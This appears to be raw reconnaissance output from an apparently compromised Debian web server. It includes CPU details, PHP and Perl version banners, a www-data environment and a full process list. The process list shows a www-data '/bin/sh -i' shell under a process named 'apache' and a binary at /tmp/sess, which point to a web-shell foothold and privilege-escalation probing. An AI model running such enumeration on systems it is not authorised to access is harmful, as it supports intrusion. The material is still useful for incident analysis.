model name	: AMD Opteron(tm) Processor 3280                 
stepping	: 2
microcode	: 0x6000623
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 1
cpu cores	: 4
apicid		: 17
initial apicid	: 1
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bogomips	: 4799.85
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate [9]

processor	: 2
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
model name	: AMD Opteron(tm) Processor 3280                 
stepping	: 2
microcode	: 0x6000623
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 2
cpu cores	: 4
apicid		: 18
initial apicid	: 2
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bogomips	: 4799.95
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate [9]

processor	: 3
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
model name	: AMD Opteron(tm) Processor 3280                 
stepping	: 2
microcode	: 0x6000623
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 3
cpu cores	: 4
apicid		: 19
initial apicid	: 3
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bogomips	: 4799.96
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate [9]

processor	: 4
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
model name	: AMD Opteron(tm) Processor 3280                 
stepping	: 2
microcode	: 0x6000623
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 4
cpu cores	: 4
apicid		: 20
initial apicid	: 4
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bogomips	: 4799.94
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate [9]

processor	: 5
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
model name	: AMD Opteron(tm) Processor 3280                 
stepping	: 2
microcode	: 0x6000623
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 5
cpu cores	: 4
apicid		: 21
initial apicid	: 5
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bogomips	: 4799.92
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate [9]

processor	: 6
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
model name	: AMD Opteron(tm) Processor 3280                 
stepping	: 2
microcode	: 0x6000623
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 6
cpu cores	: 4
apicid		: 22
initial apicid	: 6
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bogomips	: 4799.92
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate [9]

processor	: 7
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
model name	: AMD Opteron(tm) Processor 3280                 
stepping	: 2
microcode	: 0x6000623
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 7
cpu cores	: 4
apicid		: 23
initial apicid	: 7
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bogomips	: 4799.92
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate [9]


================================================
ls -la /libexec
================================================

================================================
php -v
================================================
PHP 5.4.4-14+deb7u4 (cli) (built: Aug 23 2013 14:37:41) 
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
    with eAccelerator v1.0-dev, Copyright (c) 2004-2012 eAccelerator, by eAccelerator

================================================
perl -v
================================================

This is perl 5, version 14, subversion 2 (v5.14.2) built for x86_64-linux-gnu-thread-multi
(with 80 registered patches, see perl -V for more detail)

Copyright 1987-2011, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.


================================================
ls -la /usr/sbin/wicd
================================================

================================================
env
================================================
USER=www-data
MACHTYPE=
HOSTNAME=
SHLVL=1
HOME=/var/www
TMPDIR=/tmp
TEMP=/tmp
_=/bin/sh
PATH=/usr/local/bin:/usr/bin:/bin
TMP=/tmp
MALLOC_CHECK_=2
OSTYPE=
PWD=/tmp

================================================
ps -aux
================================================
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  10788   588 ?        Ss   Aug27   1:51 init [2]         
root         2  0.0  0.0      0     0 ?        S    Aug27   0:09 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    Aug27  11:49 [ksoftirqd/0]
root         6  0.0  0.0      0     0 ?        S    Aug27   0:20 [migration/0]
root         7  0.0  0.0      0     0 ?        S    Aug27   0:30 [watchdog/0]
root         8  0.0  0.0      0     0 ?        S    Aug27   2:48 [migration/1]
root        10  0.0  0.0      0     0 ?        S    Aug27   0:35 [ksoftirqd/1]
root        12  0.0  0.0      0     0 ?        S    Aug27   0:27 [watchdog/1]
root        13  0.0  0.0      0     0 ?        S    Aug27   0:17 [migration/2]
root        15  0.0  0.0      0     0 ?        S    Aug27   1:54 [ksoftirqd/2]
root        16  0.0  0.0      0     0 ?        S    Aug27   0:26 [watchdog/2]
root        17  0.0  0.0      0     0 ?        S    Aug27   4:09 [migration/3]
root        19  0.0  0.0      0     0 ?        S    Aug27   0:20 [ksoftirqd/3]
root        20  0.0  0.0      0     0 ?        S    Aug27   0:27 [watchdog/3]
root        21  0.0  0.0      0     0 ?        S    Aug27   0:16 [migration/4]
root        23  0.0  0.0      0     0 ?        S    Aug27   1:31 [ksoftirqd/4]
root        24  0.0  0.0      0     0 ?        S    Aug27   0:27 [watchdog/4]
root        25  0.0  0.0      0     0 ?        S    Aug27   2:12 [migration/5]
root        27  0.0  0.0      0     0 ?        S    Aug27   2:00 [ksoftirqd/5]
root        28  0.0  0.0      0     0 ?        S    Aug27   0:27 [watchdog/5]
root        29  0.0  0.0      0     0 ?        S    Aug27   0:15 [migration/6]
root        31  0.0  0.0      0     0 ?        S    Aug27   1:53 [ksoftirqd/6]
root        32  0.0  0.0      0     0 ?        S    Aug27   0:26 [watchdog/6]
root        33  0.0  0.0      0     0 ?        S    Aug27   3:34 [migration/7]
root        35  0.0  0.0      0     0 ?        S    Aug27   0:15 [ksoftirqd/7]
root        36  0.0  0.0      0     0 ?        S    Aug27   0:26 [watchdog/7]
root        37  0.0  0.0      0     0 ?        S<   Aug27   0:00 [cpuset]
root        38  0.0  0.0      0     0 ?        S<   Aug27   0:00 [khelper]
root        39  0.0  0.0      0     0 ?        S    Aug27   0:00 [kdevtmpfs]
root        40  0.0  0.0      0     0 ?        S<   Aug27   0:00 [netns]
root        41  0.0  0.0      0     0 ?        S    Aug27   0:23 [sync_supers]
root        42  0.0  0.0      0     0 ?        S    Aug27   0:00 [bdi-default]
root        43  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kintegrityd]
root        44  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kblockd]
root        46  0.0  0.0      0     0 ?        S    Aug27   0:05 [khungtaskd]
root        47  0.0  0.0      0     0 ?        S    Aug27  15:46 [kswapd0]
root        48  0.0  0.0      0     0 ?        SN   Aug27   0:00 [ksmd]
root        49  0.0  0.0      0     0 ?        SN   Aug27   0:00 [khugepaged]
root        50  0.0  0.0      0     0 ?        S    Aug27   0:00 [fsnotify_mark]
root        51  0.0  0.0      0     0 ?        S<   Aug27   0:00 [crypto]
root       136  0.0  0.0      0     0 ?        S    Aug27   0:00 [khubd]
root       161  0.0  0.0      0     0 ?        S<   Aug27   0:00 [ata_sff]
root       199  0.0  0.0      0     0 ?        S    Aug27   0:00 [scsi_eh_0]
root       200  0.0  0.0      0     0 ?        S    Aug27   0:00 [scsi_eh_1]
root       201  0.0  0.0      0     0 ?        S    Aug27   0:00 [scsi_eh_2]
root       202  0.0  0.0      0     0 ?        S    Aug27   0:00 [scsi_eh_3]
root       203  0.0  0.0      0     0 ?        S    Aug27   0:00 [scsi_eh_4]
root       204  0.0  0.0      0     0 ?        S    Aug27   0:00 [scsi_eh_5]
root       207  0.0  0.0      0     0 ?        S    Aug27   0:00 [kworker/u:4]
root       208  0.0  0.0      0     0 ?        S    Aug27   0:00 [kworker/u:5]
root       242  0.0  0.0      0     0 ?        S<   Aug27   0:00 [md]
root       249  0.0  0.0      0     0 ?        S    Aug27   0:04 [md0_raid1]
root       256  0.0  0.0      0     0 ?        S    Aug27   0:53 [md1_raid1]
root       263  0.2  0.0      0     0 ?        S    Aug27 355:05 [md2_raid1]
root       276  0.0  0.0      0     0 ?        D    Aug27  71:41 [jbd2/md2-8]
root       277  0.0  0.0      0     0 ?        S<   Aug27   0:00 [ext4-dio-unwrit]
root       420  0.0  0.0  21308   436 ?        Ss   Aug27   0:00 udevd --daemon
root       585  0.0  0.0      0     0 ?        S<   Aug27   0:00 [edac-poller]
root       599  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kpsmoused]
root       652  0.0  0.0      0     0 ?        S<   Aug27   0:00 [hd-audio0]
root      1174  0.0  0.0   4316   588 ?        S    Sep03   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     1699  4.3  3.4 7263540 1138704 ?     Sl   Sep03 5757:31 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root      1700  0.0  0.0   5796   620 ?        S    Sep03   0:00 logger -t mysqld -p daemon.error
root      1833  0.0  0.0      0     0 ?        S    00:50   0:01 [kworker/6:2]
root      2091  0.0  0.0      0     0 ?        S    Aug27  23:29 [flush-9:2]
root      2139  0.0  0.0 121456  4796 ?        Sl   Aug27  18:46 /usr/sbin/rsyslogd -c5
root      2177  0.0  0.0   4112   252 ?        Ss   Aug27   0:00 /usr/sbin/acpid
root      2263  0.0  0.0  13116   480 ?        Ss   Aug27   0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      2369  0.0  0.0  20408   412 ?        Ss   Aug27   7:54 /usr/sbin/irqbalance
root      2402  0.0  0.0  49848   652 ?        Ss   Aug27   3:10 /usr/sbin/sshd
root      2642  0.0  0.0  19664  1416 pts/10   Ss   Aug31   0:00 /bin/bash
root      2659  0.0  0.0  44844  1324 pts/10   S+   Aug31   0:35 mc
root      2661  0.0  0.0  19700  1556 pts/11   Ss   Aug31   0:01 bash -rcfile .bashrc
www-data  2881  0.0  0.0  22472  3136 ?        S    00:52   0:00 apache
www-data  2882  0.0  0.0   4316   676 ?        S    00:52   0:00 /bin/sh -i
root      3115  0.0  0.0  19664  1508 pts/9    Ss   Aug30   0:00 /bin/bash
root      3133  0.0  0.0  24792   388 ?        Ss   Aug27   0:25 SCREEN
root      3137  0.0  0.0  19452   936 pts/2    Ss   Aug27   0:00 /bin/bash
root      3224  0.0  0.0  14572   252 tty1     Ss+  Aug27   0:00 /sbin/getty 38400 tty1
root      3225  0.0  0.0  14572   252 tty2     Ss+  Aug27   0:00 /sbin/getty 38400 tty2
root      3226  0.0  0.0  14572   252 tty3     Ss+  Aug27   0:00 /sbin/getty 38400 tty3
root      3227  0.0  0.0  14572   252 tty4     Ss+  Aug27   0:00 /sbin/getty 38400 tty4
root      3228  0.0  0.0  14572   252 tty5     Ss+  Aug27   0:00 /sbin/getty 38400 tty5
root      3229  0.0  0.0  14572   252 tty6     Ss+  Aug27   0:00 /sbin/getty 38400 tty6
root      3764  0.0  0.0  19452   824 pts/1    Ss   Aug27   0:00 /bin/bash
root      3779  0.0  0.0  43260   548 pts/1    S+   Aug27   0:53 mc
root      3791  0.0  0.0  19492   952 pts/3    Ss+  Aug27   0:01 bash -rcfile .bashrc
root      5930  0.0  0.0  19664  1516 pts/5    Ss   Aug28   0:00 /bin/bash
root      5959  0.0  0.0  44564  1312 pts/5    S+   Aug28   0:25 mc
root      5961  0.0  0.0  19704  1548 pts/6    Ss+  Aug28   0:01 bash -rcfile .bashrc
root      6921  0.0  0.0  42764   548 pts/2    S+   Aug27   0:03 mc
root      6924  0.0  0.0  19460   952 pts/4    Ss+  Aug27   0:00 bash -rcfile .bashrc
www-data  7671  0.2  0.0 214380 21744 ?        S    00:04   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7685  0.1  0.0 207720 14716 ?        S    00:04   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7696  0.1  0.0 212840 19996 ?        S    00:04   0:09 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7697  0.2  0.0 220304 27520 ?        S    00:04   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7699  0.2  0.0 212828 19772 ?        S    00:04   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7711  0.2  0.0 207912 15124 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7727  0.1  0.0 219084 26404 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7780  0.2  0.0 218500 25724 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7781  0.2  0.0 223360 30432 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7794  0.2  0.0 220564 27736 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7808  0.1  0.0 212824 19696 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7855  0.2  0.0 212256 19096 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7879  0.2  0.0 209316 16492 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7893  0.2  0.0 213028 19756 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7894  0.2  0.0 208232 15256 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7897  0.2  0.0 207720 14640 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7905  0.1  0.0 213716 21136 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7906  0.1  0.0 215576 22860 ?        S    00:05   0:09 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7920  0.2  0.0 206952 14408 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7921  0.1  0.0 212068 19316 ?        S    00:05   0:09 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7922  0.1  0.0 207976 15212 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7993  0.1  0.0 218996 25984 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7994  0.2  0.0 212648 18756 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  7995  0.2  0.0 220332 26848 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8006  0.2  0.0 207720 14880 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8007  0.1  0.0 212740 19648 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8008  0.1  0.0 219528 26776 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8010  0.2  0.0 210928 18072 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8011  0.2  0.0 214372 21408 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8020  0.1  0.0 209828 16912 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8021  0.1  0.0 209256 15324 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8022  0.1  0.0 212648 19172 ?        S    00:05   0:09 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8039  0.2  0.0 212324 19112 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8048  0.2  0.0 212880 19300 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8049  0.1  0.0 207464 14568 ?        S    00:05   0:09 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8051  0.1  0.0 218496 25648 ?        S    00:05   0:09 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8060  0.2  0.0 210680 17896 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8061  0.1  0.0 207720 14940 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8064  0.2  0.0 213524 20744 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8073  0.2  0.0 213296 20592 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8074  0.2  0.0 207912 15384 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8083  0.2  0.0 219092 26520 ?        S    00:05   0:13 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8101  0.1  0.0 218696 25720 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8111  0.2  0.0 213352 20588 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
postfix   8181  0.0  0.0  40004  2360 ?        S    00:05   0:00 pickup -l -t fifo -u -c
www-data  8191  0.1  0.0 209248 16372 ?        S    00:05   0:09 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8206  0.1  0.0 208756 16036 ?        S    00:05   0:09 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8207  0.1  0.0 220040 27336 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8258  0.1  0.0 225944 32872 ?        S    00:05   0:10 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data  8299  0.2  0.0 225948 32728 ?        S    00:05   0:11 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data 10410  0.1  0.0 218780 25980 ?        S    00:09   0:08 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
www-data 10540  2.4  0.0 501236 25724 ?        Sl   Dec03  28:02 nginx: worker process                   
www-data 10541  2.4  0.0 501236 26600 ?        Sl   Dec03  28:26 nginx: worker process                   
www-data 10542  2.4  0.0 574968 30164 ?        Sl   Dec03  28:23 nginx: worker process                   
www-data 10544  2.4  0.1 501236 33224 ?        Sl   Dec03  28:02 nginx: worker process                   
www-data 10545  0.0  0.0 140772  6764 ?        Sl   Dec03   0:00 nginx: cache manager process            
zabbix   10568  0.0  0.0  65008   892 ?        S    Dec03   0:00 /usr/sbin/zabbix_agentd
zabbix   10569  0.0  0.0  65008  1328 ?        S    Dec03   0:36 /usr/sbin/zabbix_agentd
zabbix   10571  0.1  0.0  65008  1196 ?        S    Dec03   1:21 /usr/sbin/zabbix_agentd
zabbix   10572  0.1  0.0  65008  1196 ?        S    Dec03   1:21 /usr/sbin/zabbix_agentd
zabbix   10573  0.1  0.0  65008  1192 ?        S    Dec03   1:22 /usr/sbin/zabbix_agentd
zabbix   10574  0.1  0.0  65008  1192 ?        S    Dec03   1:21 /usr/sbin/zabbix_agentd
zabbix   10575  0.1  0.0  65008  1192 ?        S    Dec03   1:21 /usr/sbin/zabbix_agentd
root     12241  0.0  0.0 198276  5640 ?        Ss   Dec01   1:20 /usr/bin/php5-cgi --fpm --fpm-config /etc/php-fpm.conf
proftpd  12372  0.0  0.0 101684  2180 ?        Ss   Dec01   0:05 proftpd: (accepting connections)              
www-data 12721  0.0  0.0      0     0 ?        Z    01:08   0:00 [1] <defunct>
root     13202  0.0  0.0 252376 16932 ?        S    01:09   0:00 /usr/sbin/apache2 -k start
root     13986  0.0  0.0      0     0 ?        S    01:10   0:00 [kworker/5:0]
root     14361  0.0  0.0      0     0 ?        S    01:11   0:00 [kworker/2:1]
root     14415  0.0  0.0  19336  1116 ?        S    Sep17   0:04 /usr/sbin/smartd --pidfile /var/run/smartd.pid
postfix  15990  0.0  0.0  44748  4204 ?        S    00:19   0:00 smtpd -n smtp -t inet -u -c
root     16526  0.0  0.0  19676  1824 pts/12   Ss+  Sep03   0:00 /bin/bash
root     16862  0.0  0.0      0     0 ?        S    01:15   0:00 [kworker/1:2]
root     17242  0.0  0.0      0     0 ?        S    01:15   0:00 [kworker/0:1]
root     17688  0.0  0.0 106656  1688 pts/11   S+   Sep02   0:00 mysql -u root -p
root     18064  0.0  0.0 252376 16932 ?        S    01:17   0:00 /usr/sbin/apache2 -k start
root     18493  0.0  0.0      0     0 ?        S    01:17   0:00 [kworker/4:0]
root     18496  0.0  0.0 252376 16932 ?        S    01:17   0:00 /usr/sbin/apache2 -k start
root     18753  0.0  0.0      0     0 ?        S    Aug28  16:19 [kauditd]
root     19176  0.0  0.0      0     0 ?        S    01:18   0:00 [kworker/7:2]
root     19212  0.0  0.0      0     0 ?        S    01:18   0:00 [kworker/3:1]
www-data 20250  0.0  0.0  14684   672 ?        S    01:20   0:00 /tmp/sess
www-data 20251  0.0  0.0  17956  1912 pts/0    Ss   01:20   0:00 bash
root     20411  0.0  0.1 132572 38668 ?        Ss   Sep28   0:01 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
root     20456  0.0  0.0      0     0 ?        S    01:20   0:00 [kworker/5:2]
root     20571  0.0  0.0  37936  2036 ?        Ss   Aug28   1:26 /usr/lib/postfix/master
postfix  20583  0.0  0.0  40264  2328 ?        S    Aug28   0:44 qmgr -l -t fifo -u
root     20776  0.1  0.0 112252  1000 ?        S<sl Sep02 156:45 /sbin/auditd
root     20778  0.0  0.0  80180   816 ?        S<sl Sep02  90:37 /sbin/audispd
root     20792  0.0  0.0      0     0 ?        S    01:21   0:00 [kworker/2:2]
root     21120  0.0  0.0 347500  7960 ?        Sl   Oct02  36:25 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock
root     21168  0.0  0.0  19020   924 ?        Ss   Aug28   0:12 /usr/sbin/cron
daemon   21203  0.0  0.0  16812    16 ?        Ss   Aug28   0:00 /usr/sbin/atd
root     21388  0.0  0.0 252344 23368 ?        Ss   Sep06  15:43 /usr/sbin/apache2 -k start
root     21665  0.0  0.0      0     0 ?        S    01:22   0:00 [kworker/4:2]
root     21834  0.0  0.0  92280 32016 pts/9    S+   Sep02   1:37 mc
root     22159  0.0  0.0  19688  1820 pts/13   Ss+  Sep02   0:02 bash -rcfile .bashrc
root     22352  0.0  0.0      0     0 ?        S    01:23   0:00 [kworker/7:0]
root     22366  0.0  0.0      0     0 ?        S    01:23   0:00 [kworker/3:2]
root     22975  0.0  0.0      0     0 ?        S    01:24   0:00 [kworker/6:1]
root     23175  0.0  0.0      0     0 ?        S    01:25   0:00 [kworker/1:1]
root     23456  0.0  0.0      0     0 ?        S    01:25   0:00 [kworker/0:0]
root     23589  0.0  0.0      0     0 ?        S    01:25   0:00 [kworker/5:1]
root     23918  0.1  0.0      0     0 ?        S    01:26   0:00 [kworker/2:0]
root     23966  0.0  0.0 252376 16932 ?        S    01:26   0:00 /usr/sbin/apache2 -k start
root     24167  0.0  0.0 252376 16932 ?        S    01:26   0:00 /usr/sbin/apache2 -k start
root     24705  0.0  0.0      0     0 ?        S    01:27   0:00 [kworker/4:1]
